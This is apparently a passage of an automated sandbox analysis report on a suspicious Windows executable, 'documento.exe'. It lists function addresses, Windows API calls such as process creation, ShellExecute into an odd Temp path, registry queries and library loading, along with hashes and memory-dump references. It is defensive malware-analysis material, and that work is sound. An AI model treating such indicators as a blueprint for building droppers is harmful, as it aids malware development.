                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 452643e19685fcea5462b53912e8b008e2854c88062b067f0f8fd89253b448af
                                                • Instruction ID: 258a3fd06c35fad05ca81ab60d081a33c15d1deb970c592860f690c18264f2bd
                                                • Opcode Fuzzy Hash: 452643e19685fcea5462b53912e8b008e2854c88062b067f0f8fd89253b448af
                                                • Instruction Fuzzy Hash: 5D711271E04228CBDF24CFA8C8547ADBBF1FB44305F15806AD856BB281D7785A96DF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406701 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 12a72383bc36c7d96190d5e65704f25bda740c5ae2a23a9d2252c3d1e3b898a5
                                                • Instruction ID: babde66c8cd488a95ab0ad7164d611a89d90f571a219cc2b865e3b094ddf9d96
                                                • Opcode Fuzzy Hash: 12a72383bc36c7d96190d5e65704f25bda740c5ae2a23a9d2252c3d1e3b898a5
                                                • Instruction Fuzzy Hash: 28712471E04228CBDF28CFA8C8547ADBBB1FB44305F15816ED856BB281C7785A96DF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040664D Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 61a2e03896eecfdf1d4da445d37de20e8426d4ebfe516142fa5c4c165488df89
                                                • Instruction ID: 6cdc3ec63689871e8710e51dd90966e3aca29af0085505062bf66b2ee05b33a6
                                                • Opcode Fuzzy Hash: 61a2e03896eecfdf1d4da445d37de20e8426d4ebfe516142fa5c4c165488df89
                                                • Instruction Fuzzy Hash: 25714571E04228CBDF28CF98C8547ADBBB1FB44305F11806ED856BB281C7786A96DF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401E44 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00404F16: lstrlenA.KERNEL32(rghtten,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4F
                                                  • Part of subcall function 00404F16: lstrlenA.KERNEL32(00402FCF,rghtten,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5F
                                                  • Part of subcall function 00404F16: lstrcatA.KERNEL32(rghtten,00402FCF,00402FCF,rghtten,00000000,0040E8D8,00000000), ref: 00404F72
                                                  • Part of subcall function 00404F16: SetWindowTextA.USER32(rghtten,rghtten), ref: 00404F84
                                                  • Part of subcall function 00404F16: SendMessageA.USER32 ref: 00404FAA
                                                  • Part of subcall function 00404F16: SendMessageA.USER32 ref: 00404FC4
                                                  • Part of subcall function 00404F16: SendMessageA.USER32 ref: 00404FD2
                                                  • Part of subcall function 0040548E: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421528,Error launching installer), ref: 004054B7
                                                  • Part of subcall function 0040548E: CloseHandle.KERNEL32(?), ref: 004054C4
                                                • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
                                                • CloseHandle.KERNEL32(?), ref: 00401EB3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                • String ID:
                                                • API String ID: 3521207402-0
                                                • Opcode ID: 72a581bbba54c9cbde4d6975f76086a222e3956d5bb43ae7d71fe76beb1543f5
                                                • Instruction ID: b8d0583dc05b8a4b641891086a9cee3b9fffb48cfcfca3e9183047df695922e9
                                                • Opcode Fuzzy Hash: 72a581bbba54c9cbde4d6975f76086a222e3956d5bb43ae7d71fe76beb1543f5
                                                • Instruction Fuzzy Hash: 6E016D31904108EBDF11AFA1C98599F7BB6EF00354F20807BFA01B52E1C7785E55DB9A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405BE4 Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExA.KERNEL32(80000002,00405E29,00000000,00000002,?), ref: 00405C0D
                                                • RegQueryValueExA.KERNEL32 ref: 00405C2E
                                                • RegCloseKey.KERNEL32(?), ref: 00405C4F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID:
                                                • API String ID: 3677997916-0
                                                • Opcode ID: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                • Instruction ID: aa1ddffca215974e7db513772cf32b94c10ac9f3b952a48a6b2e4b760bc22b34
                                                • Opcode Fuzzy Hash: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                • Instruction Fuzzy Hash: 0B01487254420AEFEB128F64ED44EEB3FACEF15354B004026F905A6220D235D964CBA6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402482 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00402B44: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00000022,00000000), ref: 00402B6C
                                                • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
                                                • RegEnumValueA.ADVAPI32 ref: 004024C3
                                                • RegCloseKey.KERNEL32(?), ref: 004024D8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: Enum$CloseOpenValue
                                                • String ID:
                                                • API String ID: 167947723-0
                                                • Opcode ID: 677bdc88bce3e1e7e8eb01a68c937f1af1addeb258e3eaebf081c5251f1331a7
                                                • Instruction ID: e09e8e067f2b8771eb66943483239aed03eb61d96520190a1401bf15a77a7747
                                                • Opcode Fuzzy Hash: 677bdc88bce3e1e7e8eb01a68c937f1af1addeb258e3eaebf081c5251f1331a7
                                                • Instruction Fuzzy Hash: BAF0AD72A04200BFEB11AF659E88EBB7A6DEB80344B10443AF505A61C0D6B84A459A7A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401DEA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                                Download Yara Rule
                                                APIs
                                                • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp\Deinotherium\Pugilist\Unreturnableness\Tapeta\Vulgare,?), ref: 00401E30
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\Deinotherium\Pugilist\Unreturnableness\Tapeta\Vulgare, xrefs: 00401E1B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: ExecuteShell
                                                • String ID: C:\Users\user\AppData\Local\Temp\Deinotherium\Pugilist\Unreturnableness\Tapeta\Vulgare
                                                • API String ID: 587946157-123516722
                                                • Opcode ID: 2c6f028ace9ee28ba9af41cfcce1795a7e5fe9b3bc8022bb32b22207bedf057e
                                                • Instruction ID: ee8d38ae8572f78804fc61ee43f60716403cc2376375e1dcbb8ba3fba782be0d
                                                • Opcode Fuzzy Hash: 2c6f028ace9ee28ba9af41cfcce1795a7e5fe9b3bc8022bb32b22207bedf057e
                                                • Instruction Fuzzy Hash: ACF02272B041007FDB10ABB19D4AF5E2AA8AB61319F20493BF141F60C2DABC88019A28
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402410 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00402B44: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00000022,00000000), ref: 00402B6C
                                                • RegQueryValueExA.ADVAPI32 ref: 00402440
                                                • RegCloseKey.KERNEL32(?), ref: 004024D8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID:
                                                • API String ID: 3677997916-0
                                                • Opcode ID: 3d06c792d204b5780c99020f1df9334d27262dd1fda640259017b7665588fed0
                                                • Instruction ID: e2c7ba43779b99907ab4ed3cb5240aedb23d0abedd6968282b04b845729cd546
                                                • Opcode Fuzzy Hash: 3d06c792d204b5780c99020f1df9334d27262dd1fda640259017b7665588fed0
                                                • Instruction Fuzzy Hash: C7119471905205EEDF14DF64C6889AEBBB4EF11349F20843FE542B62C0D2B84A45DA5A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: f500664b12d1a9ca3d846aae4db6b5f226f7dec665eeac70e15b2afbb9a011de
                                                • Instruction ID: f7ce4a596c66e03a629b41503ee4a79f45406b0749a56119d0920da1f960bb93
                                                • Opcode Fuzzy Hash: f500664b12d1a9ca3d846aae4db6b5f226f7dec665eeac70e15b2afbb9a011de
                                                • Instruction Fuzzy Hash: 0E01F431B24210ABE7194B389E04B6A37A8E710314F11823BF911F66F1D7B8DC42AB4D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404FE8 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 00404FF8
                                                  • Part of subcall function 00403F2E: SendMessageA.USER32 ref: 00403F40
                                                • OleUninitialize.OLE32 ref: 00405044
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: InitializeMessageSendUninitialize
                                                • String ID:
                                                • API String ID: 2896919175-0
                                                • Opcode ID: d3b6dbed7c397c7d965c7b5dc9da2b27708715bb4eb5028dd1fcf91096d05334
                                                • Instruction ID: 5c307a7216673bc61f70b616c35f5055657c704e5bc639d6389db7f9009c9d2b
                                                • Opcode Fuzzy Hash: d3b6dbed7c397c7d965c7b5dc9da2b27708715bb4eb5028dd1fcf91096d05334
                                                • Instruction Fuzzy Hash: B3F0F0FAA00601BADB605F119C00B1B77B4DBD0746F10803AFE44A22A0D73998428AAD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401567 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                Download Yara Rule
                                                APIs
                                                • ShowWindow.USER32(00010350), ref: 00401579
                                                • ShowWindow.USER32(00010348), ref: 0040158E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: ShowWindow
                                                • String ID:
                                                • API String ID: 1268545403-0
                                                • Opcode ID: 9dbd9b7718999257957ecf96969e76a3a03f192157de06d7b0b0cd9deed0d964
                                                • Instruction ID: 7a448c7715a17160088acb1a6ba8cb9818a258c7baefa7eb8fde05be1467c36a
                                                • Opcode Fuzzy Hash: 9dbd9b7718999257957ecf96969e76a3a03f192157de06d7b0b0cd9deed0d964
                                                • Instruction Fuzzy Hash: A7E04F76B10104ABDB14EBA4EE8086E77A7E794310360447BD202B3694C2B89D459A68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406092 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,?,?,00403147,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004060A4
                                                • GetProcAddress.KERNEL32(00000000,?,?,?,00403147,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004060BF
                                                  • Part of subcall function 00406028: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040603F
                                                  • Part of subcall function 00406028: wsprintfA.USER32 ref: 00406078
                                                  • Part of subcall function 00406028: LoadLibraryA.KERNEL32(?), ref: 00406088
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                • String ID:
                                                • API String ID: 2547128583-0
                                                • Opcode ID: 9d06168268301413df58d073caad4fe4514c6b8c3f7d40560c439a7b978b8ec9
                                                • Instruction ID: 774eb21b39d2aab2af5da2aca531c8e6d79f2737565152ed1a094a03d1eb9b6f
                                                • Opcode Fuzzy Hash: 9d06168268301413df58d073caad4fe4514c6b8c3f7d40560c439a7b978b8ec9
                                                • Instruction Fuzzy Hash: 28E0863254411166D610E7705D0487773AC9F84711302883EF942F2150D734AC26A669
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405970 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\documento.exe,80000000,00000003), ref: 00405974
                                                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405996
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: afccfa4f4cb9885f70129b38e82a9c897481b005b6ad677f4785abde6c99dd13
                                                • Instruction ID: f6a7e9eb3deff2eb260b804c641ce7d3451857e515cdc874e2100240a7e6f5b1
                                                • Opcode Fuzzy Hash: afccfa4f4cb9885f70129b38e82a9c897481b005b6ad677f4785abde6c99dd13
                                                • Instruction Fuzzy Hash: D2D09E31658301AFEF098F20DD1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040594B Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesA.KERNELBASE(?,?,00405563,?,?,00000000,00405746,?,?,?,?), ref: 00405950
                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405964
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
